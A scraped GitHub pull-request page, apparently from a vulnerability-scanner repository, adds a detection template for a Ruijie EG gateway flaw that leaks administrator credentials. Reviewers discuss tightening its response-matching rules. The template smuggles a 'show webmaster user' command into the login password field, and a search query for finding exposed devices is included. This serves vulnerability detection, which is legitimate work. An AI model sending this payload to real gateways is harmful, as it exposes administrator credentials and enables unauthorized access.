-
Notifications
You must be signed in to change notification settings - Fork 1.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Create ruijie-eg-info-leak #1214
Conversation
pocs/ruijie-eg-info-leak.yml
Outdated
body: | | ||
username=admin&password=admin?show+webmaster+user | ||
expression: | | ||
response.status == 200 && "{\"data\":\".*?(\\w+)\\s(\\w+)\",\"status\":1}".bmatches(response.body) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
这里的匹配规则较弱,容易误报。建议通过访问一个需要登录的页面来验证
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
已修改。
pocs/ruijie-eg-info-leak.yml
Outdated
body: | | ||
username={{username}}&password={{password}} | ||
expression: | | ||
response.status == 200 && response.body.bcontains(b"{\"data\":\"0\",\"status\":1}") |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
这里的匹配规则还是太弱了,容易误报。建议加上 ruijie 相关特征的匹配,我看响应头里有:Set-Cookie: RUIJIEID....... 可以加到匹配规则里。同时,建议在 response.status == 200 后面加上对 Content-Type 的匹配
本 poc 是检测什么漏洞的
锐捷网关(RG-EG)信息泄露管理员账号密码
测试环境
Fofa:app="Ruijie-EG易网关"
备注
测试POC请使用如下系统: